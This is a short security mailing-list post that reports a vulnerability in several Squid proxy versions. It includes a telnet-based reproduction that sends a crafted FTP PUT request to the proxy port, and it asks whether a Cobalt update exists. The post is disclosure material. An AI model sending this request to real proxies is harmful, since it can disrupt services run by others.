http://www.securiteam.com/unixfocus/5AP0S0U5FI.html http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3354 Vulnerable systems: Squid version 2.4STABLE2 Squid version 2.4STABLE1 Squid version 2.3STABLE4 (All versions of SQUID are assumed to be vulnerable) Recreation: $ telnet proxy:3128 PUT ftp://whatever:[EMAIL PROTECTED]/ HTTP/1.1 Content-type: application/octet-stream Content-length: 0 Pragma: no-cache any update for colbat? Alexandre Da Fonseca aka Deepquest Chief of Technology Officer "Ubi solitudinem faciunt, pacem appelant" ------------------------------------------------------------- Code511 work:+33-14088-9595 http://www.code511.com cell:+33-66442-1595 PGP DH/DSS http://www.code511.com/pgp fax :+33-14722-7278 ------------------------------------------------------------- _______________________________________________ cobalt-security mailing list [EMAIL PROTECTED] http://list.cobalt.com/mailman/listinfo/cobalt-security
